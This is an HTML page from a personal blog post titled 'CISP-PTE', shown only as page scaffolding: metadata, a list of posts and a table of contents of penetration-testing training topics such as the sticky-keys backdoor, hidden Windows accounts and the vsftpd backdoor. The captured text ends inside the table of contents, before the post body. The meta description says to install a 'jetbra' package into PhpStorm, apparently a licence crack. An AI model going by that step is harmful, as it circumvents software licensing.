<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>CISP-PTE | 黄金贤的博客</title>
  <meta name="keywords" content="">
  <meta name="description" content="CISP-PTE | 黄金贤的博客">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="概述# PHP是一种运行在服务器端的脚步语言，可以嵌入到HTML中。是一中面向对象的、解释的。7.3版本比较好用 # 1994年   环境准备# 安装 PhpStorm # https:&#x2F;&#x2F;3.jetbra.in&#x2F; 下载安装包 jetbra.zip 解压后放在 PhpStorm 的bin目录下, 为 jetbra 目录 # 双击 \bin\jetbra\scripts\install-all-us">
<meta property="og:type" content="article">
<meta property="og:title" content="Php">
<meta property="og:url" content="https://hjxstart.github.io/2025/09/13/Php/index.html">
<meta property="og:site_name" content="黄金贤的博客">
<meta property="og:description" content="概述# PHP是一种运行在服务器端的脚步语言，可以嵌入到HTML中。是一中面向对象的、解释的。7.3版本比较好用 # 1994年   环境准备# 安装 PhpStorm # https:&#x2F;&#x2F;3.jetbra.in&#x2F; 下载安装包 jetbra.zip 解压后放在 PhpStorm 的bin目录下, 为 jetbra 目录 # 双击 \bin\jetbra\scripts\install-all-us">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250913234353519.png">
<meta property="article:published_time" content="2025-09-13T15:10:00.000Z">
<meta property="article:modified_time" content="2025-10-05T03:22:16.168Z">
<meta property="article:author" content="黄金贤">
<meta property="article:tag" content="计算机网络 数据库 操作系统 数据结构 算法 Java Nodejs">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250913234353519.png">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-dark.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>


<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 8.0.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>黄金贤</span>
</div>

<div class="icon">
    
        
            <a title="github"
               href="https://github.com/hjxstart"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="email"
               href="mailto:hjxstart@126.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=1726283687&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
</div>




<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(66)</small>
            
        </div>
    </li>
    
        
            
                <li>
                    <div data-rel="运维">
                        
                        运维
                        <small>(20)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="开发">
                        
                        开发
                        <small>(12)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="读书">
                        
                        读书
                        <small>(2)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="安全">
                        
                        安全
                        <small>(3)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="工具">
                        
                        工具
                        <small>(10)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="数据库">
                        
                        数据库
                        <small>(5)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="网络">
                        
                        网络
                        <small>(14)</small>
                        
                    </div>
                    
                </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="66">
<input type="hidden" id="yelog_site_word_count" value="243.1k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://github.com/hjxstart">hjxstart</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
    </div>

</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        <a id="top" class="全部文章 网络 "
           href="/2024/05/06/HCIE%20Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HCIE Lab">HCIE Lab</span>
            <span class="post-date" title="2024-05-06 19:42:00">2024/05/06</span>
        </a>
        
        <a id="top" class="全部文章 安全 "
           href="/2025/08/17/CISP-PTE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CISP-PTE">CISP-PTE</span>
            <span class="post-date" title="2025-08-17 11:12:00">2025/08/17</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2021/09/09/VMware/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="VMware">VMware</span>
            <span class="post-date" title="2021-09-09 15:38:00">2021/09/09</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2025/04/04/PXE-Kickstart/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="PXE+Kickstart">PXE+Kickstart</span>
            <span class="post-date" title="2025-04-04 10:45:00">2025/04/04</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2025/02/12/KylinOS/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="KylinOS">KylinOS</span>
            <span class="post-date" title="2025-02-12 16:47:00">2025/02/12</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2025/08/24/KylinOS-FAQ/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="KylinOS FAQ">KylinOS FAQ</span>
            <span class="post-date" title="2025-08-24 11:07:00">2025/08/24</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2025/08/24/Windows/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Windows">Windows</span>
            <span class="post-date" title="2025-08-24 11:19:00">2025/08/24</span>
        </a>
        
        <a id="top" class="全部文章 运维 "
           href="/2022/03/24/Linux/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Linux">Linux</span>
            <span class="post-date" title="2022-03-24 11:53:00">2022/03/24</span>
        </a>
        
        <a id="top" class="全部文章 工具 "
           href="/2024/07/28/NTLite/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="NTLite">NTLite</span>
            <span class="post-date" title="2024-07-28 21:32:00">2024/07/28</span>
        </a>
        
        <a id="top" class="全部文章 数据库 "
           href="/2020/03/19/MySQL/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="MySQL">MySQL</span>
            <span class="post-date" title="2020-03-19 21:51:00">2020/03/19</span>
        </a>
        
        <a id="top" class="全部文章 开发 "
           href="/2025/09/13/Php/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Php">Php</span>
            <span class="post-date" title="2025-09-13 23:10:00">2025/09/13</span>
        </a>
        
        <a  class="全部文章 安全 "
           href="/2025/08/21/cisp-practice/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="cisp-practice">cisp-practice</span>
            <span class="post-date" title="2025-08-21 19:41:00">2025/08/21</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2025/04/24/OpenStack/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="OpenStack">OpenStack</span>
            <span class="post-date" title="2025-04-24 09:04:00">2025/04/24</span>
        </a>
        
        <a  class="全部文章 安全 "
           href="/2024/08/23/CISO/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CISO">CISO</span>
            <span class="post-date" title="2024-08-23 19:29:00">2024/08/23</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/04/16/%E7%BD%91%E7%BB%9C%E5%B7%A5%E7%A8%8B%E5%B8%88/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="网络工程师">网络工程师</span>
            <span class="post-date" title="2024-04-16 22:14:00">2024/04/16</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/STP/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="STP">STP</span>
            <span class="post-date" title="2024-01-27 14:01:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/VLAN/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="VLAN">VLAN</span>
            <span class="post-date" title="2024-01-27 11:42:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/LLDP/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="LLDP">LLDP</span>
            <span class="post-date" title="2024-01-27 11:31:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/Telnet/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Telnet">Telnet</span>
            <span class="post-date" title="2024-01-27 10:45:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2024/01/27/SSH/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="SSH">SSH</span>
            <span class="post-date" title="2024-01-27 10:44:00">2024/01/27</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2023/12/22/WireGuard/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="WireGuard">WireGuard</span>
            <span class="post-date" title="2023-12-22 07:40:00">2023/12/22</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/12/21/Stack-Port/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Stack Port">Stack Port</span>
            <span class="post-date" title="2023-12-21 19:31:00">2023/12/21</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2023/12/18/RouterOS/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="RouterOS">RouterOS</span>
            <span class="post-date" title="2023-12-18 17:05:00">2023/12/18</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2023/12/18/GIT/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="GIT">GIT</span>
            <span class="post-date" title="2023-12-18 17:00:00">2023/12/18</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2023/11/30/HelpDesk/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HelpDesk">HelpDesk</span>
            <span class="post-date" title="2023-11-30 21:21:00">2023/11/30</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2023/11/18/OpenWrt/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="OpenWrt">OpenWrt</span>
            <span class="post-date" title="2023-11-18 17:03:00">2023/11/18</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/06/01/HCNP-Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="华为NP网络实验">华为NP网络实验</span>
            <span class="post-date" title="2023-06-01 10:46:04">2023/06/01</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/06/01/CCNP-Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CCNP Lab">CCNP Lab</span>
            <span class="post-date" title="2023-06-01 10:46:00">2023/06/01</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2023/05/13/IBMC/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="IBMC">IBMC</span>
            <span class="post-date" title="2023-05-13 21:04:00">2023/05/13</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2023/04/26/1Panel/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="1Panel">1Panel</span>
            <span class="post-date" title="2023-04-26 14:09:00">2023/04/26</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/04/08/HCNA-Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HCNA Lab">HCNA Lab</span>
            <span class="post-date" title="2023-04-08 11:46:00">2023/04/08</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/04/07/CCNA-Lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CCNA Lab">CCNA Lab</span>
            <span class="post-date" title="2023-04-07 20:13:29">2023/04/07</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2023/04/07/OSPF/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="OSPF">OSPF</span>
            <span class="post-date" title="2023-04-07 19:19:00">2023/04/07</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2022/08/24/FRP/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="FRP">FRP</span>
            <span class="post-date" title="2022-08-24 12:47:00">2022/08/24</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2022/08/12/HomeLab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HomeLab">HomeLab</span>
            <span class="post-date" title="2022-08-12 15:09:00">2022/08/12</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2022/07/28/WDS-MDT/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="WDS+MDT">WDS+MDT</span>
            <span class="post-date" title="2022-07-28 21:33:00">2022/07/28</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2022/06/21/Anaconda/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Anaconda">Anaconda</span>
            <span class="post-date" title="2022-06-21 20:56:00">2022/06/21</span>
        </a>
        
        <a  class="全部文章 网络 "
           href="/2022/05/25/%E7%BD%91%E7%BB%9C%E8%A7%84%E5%88%92%E5%B8%88/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="网络规划师">网络规划师</span>
            <span class="post-date" title="2022-05-25 11:57:00">2022/05/25</span>
        </a>
        
        <a  class="全部文章 数据库 "
           href="/2022/03/14/InfluxDB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="InfluxDB">InfluxDB</span>
            <span class="post-date" title="2022-03-14 13:25:00">2022/03/14</span>
        </a>
        
        <a  class="全部文章 数据库 "
           href="/2022/03/06/MongoDB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="MongoDB">MongoDB</span>
            <span class="post-date" title="2022-03-06 17:38:00">2022/03/06</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2021/12/27/VIM/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="VIM">VIM</span>
            <span class="post-date" title="2021-12-27 09:15:00">2021/12/27</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/12/16/VSFTPD/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="VSFTPD">VSFTPD</span>
            <span class="post-date" title="2021-12-16 08:49:00">2021/12/16</span>
        </a>
        
        <a  class="全部文章 数据库 "
           href="/2021/10/06/REDIS/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="REDIS">REDIS</span>
            <span class="post-date" title="2021-10-06 17:19:00">2021/10/06</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/09/20/K8s-lab/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="K8s_lab">K8s_lab</span>
            <span class="post-date" title="2021-09-20 08:04:00">2021/09/20</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/09/15/K8s/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="K8s">K8s</span>
            <span class="post-date" title="2021-09-15 20:48:00">2021/09/15</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/09/08/Ingress/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Ingress">Ingress</span>
            <span class="post-date" title="2021-09-08 23:56:00">2021/09/08</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/09/08/Harbor/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Harbor">Harbor</span>
            <span class="post-date" title="2021-09-08 18:04:00">2021/09/08</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/08/26/Go/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Go">Go</span>
            <span class="post-date" title="2021-08-26 11:50:00">2021/08/26</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/08/15/Java%E5%A4%9A%E7%BA%BF%E7%A8%8B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Java多线程">Java多线程</span>
            <span class="post-date" title="2021-08-15 14:36:00">2021/08/15</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/08/11/Nginx/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Nginx">Nginx</span>
            <span class="post-date" title="2021-08-11 23:28:00">2021/08/11</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/08/06/Maven/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Maven">Maven</span>
            <span class="post-date" title="2021-08-06 09:38:00">2021/08/06</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/07/31/Springboot%E9%A1%B9%E7%9B%AE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Springboot项目">Springboot项目</span>
            <span class="post-date" title="2021-07-31 19:34:00">2021/07/31</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/07/22/Docker/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Docker">Docker</span>
            <span class="post-date" title="2021-07-22 14:53:00">2021/07/22</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/07/19/SpringSecurity/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="SpringSecurity">SpringSecurity</span>
            <span class="post-date" title="2021-07-19 20:58:00">2021/07/19</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/07/13/Mybatis/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Mybatis">Mybatis</span>
            <span class="post-date" title="2021-07-13 10:38:00">2021/07/13</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/07/05/NVM/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="NVM">NVM</span>
            <span class="post-date" title="2021-07-05 08:15:00">2021/07/05</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/06/26/Java-Project/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Java Project">Java Project</span>
            <span class="post-date" title="2021-06-26 07:58:00">2021/06/26</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/06/23/Vue/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Vue">Vue</span>
            <span class="post-date" title="2021-06-23 10:48:00">2021/06/23</span>
        </a>
        
        <a  class="全部文章 开发 "
           href="/2021/06/08/SpringBoot2/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="SpringBoot2">SpringBoot2</span>
            <span class="post-date" title="2021-06-08 16:51:00">2021/06/08</span>
        </a>
        
        <a  class="全部文章 运维 "
           href="/2021/06/07/CentOS7/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CentOS7">CentOS7</span>
            <span class="post-date" title="2021-06-07 23:16:00">2021/06/07</span>
        </a>
        
        <a  class="全部文章 读书 "
           href="/2021/04/18/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="设计模式">设计模式</span>
            <span class="post-date" title="2021-04-18 22:19:00">2021/04/18</span>
        </a>
        
        <a  class="全部文章 数据库 "
           href="/2021/03/22/SQL/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="SQL">SQL</span>
            <span class="post-date" title="2021-03-22 18:33:00">2021/03/22</span>
        </a>
        
        <a  class="全部文章 读书 "
           href="/2021/03/14/%E6%97%B6%E9%97%B4%E7%AE%A1%E7%90%86/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="时间管理">时间管理</span>
            <span class="post-date" title="2021-03-14 21:49:00">2021/03/14</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2021/03/14/Hexo/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Hexo">Hexo</span>
            <span class="post-date" title="2021-03-14 08:31:00">2021/03/14</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2020/09/12/UltraISO/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="UltraISO">UltraISO</span>
            <span class="post-date" title="2020-09-12 11:42:00">2020/09/12</span>
        </a>
        
        <a  class="全部文章 工具 "
           href="/2020/09/12/Ventoy/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Ventoy">Ventoy</span>
            <span class="post-date" title="2020-09-12 11:42:00">2020/09/12</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-CISP-PTE" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">CISP-PTE</h1>
    
    <div class="article-meta">
        
        <span class="top"><a>置顶</a></span>
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="安全">安全</a>
            
        </span>
        
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2025-10-05 11:22:16'>2025-08-17 11:12</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:5.3k</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%B9%E8%AE%AD"><span class="toc-text">培训</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E5%A4%A9-%E5%BC%80%E7%8F%AD%E5%87%86%E5%A4%87"><span class="toc-text">第一天 开班准备</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AD%A6%E4%B9%A0%E5%AF%84%E8%AF%AD"><span class="toc-text">学习寄语</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B5%84%E6%96%99%E4%B8%8B%E8%BD%BD"><span class="toc-text">资料下载</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87"><span class="toc-text">环境准备</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E5%A4%A9-%E6%A1%8C%E9%9D%A2%E8%99%9A%E6%8B%9F%E7%8E%AF%E5%A2%83"><span class="toc-text">第二天 桌面虚拟环境</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows7"><span class="toc-text">Windows7</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WinServer2019"><span class="toc-text">WinServer2019</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#VM%E7%BD%91%E7%BB%9C%E6%A8%A1%E5%BC%8F"><span class="toc-text">VM网络模式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Dos%E5%91%BD%E4%BB%A4"><span class="toc-text">Dos命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cisp-practise01"><span class="toc-text">cisp-practise01</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%B8%89%E5%A4%A9-Windows"><span class="toc-text">第三天 Windows</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90"><span class="toc-text">权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%A8%E6%88%B7"><span class="toc-text">用户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%84"><span class="toc-text">组</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5%E6%AC%A1shift%E6%BC%8F%E6%B4%9E"><span class="toc-text">5次shift漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E7%AD%96%E7%95%A5"><span class="toc-text">安全策略</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows%E9%9A%90%E8%97%8F%E8%B4%A6%E5%8F%B7"><span class="toc-text">Windows隐藏账号</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cisp-practise02"><span class="toc-text">cisp-practise02</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cisp-practise03"><span class="toc-text">cisp-practise03</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E5%9B%9B%E5%A4%A9-Linux"><span class="toc-text">第四天 Linux</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Centos7-%E5%AE%89%E8%A3%85"><span class="toc-text">Centos7 安装</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Centos7%E7%BD%91%E7%BB%9C%E9%85%8D%E7%BD%AE"><span class="toc-text">Centos7网络配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Centos7-%E6%9B%B4%E6%8D%A2Yum%E6%BA%90"><span class="toc-text">Centos7 更换Yum源</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C"><span class="toc-text">文件操作</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AECentos7"><span class="toc-text">配置Centos7</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E7%BB%93%E6%9E%84"><span class="toc-text">目录结构</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%E2%80%93file"><span class="toc-text">Linux文件类型–file</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8E%8B%E7%BC%A9%E5%92%8C%E5%A4%87%E4%BB%BD"><span class="toc-text">文件压缩和备份</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E5%91%BD%E4%BB%A4"><span class="toc-text">其他命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#VIM-%E7%BC%96%E8%BE%91%E5%B7%A5%E5%85%B7"><span class="toc-text">VIM 编辑工具</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E6%9D%83%E9%99%90-%E7%94%A8%E6%88%B7"><span class="toc-text">文件权限&amp;用户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#top%E5%91%BD%E4%BB%A4"><span class="toc-text">top命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cisp-practise04"><span class="toc-text">cisp-practise04</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%BA%94%E5%A4%A9-Kali-%E7%BD%91%E7%BB%9C-rpm%E5%8C%85%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7"><span class="toc-text">第五天 Kali 网络&amp;rpm包管理工具</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E8%A3%85%E5%92%8C%E9%85%8D%E7%BD%AEKali"><span class="toc-text">安装和配置Kali</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E9%85%8D%E7%BD%AE"><span class="toc-text">网络配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%91%E8%84%B8%E6%BC%8F%E6%B4%9E%EF%BC%8C2-3%E5%8F%8A%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC"><span class="toc-text">笑脸漏洞，2.3及以下版本</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%B6%E4%BB%96"><span class="toc-text">其他</span></a><ol class="toc-child"><li class="toc-item 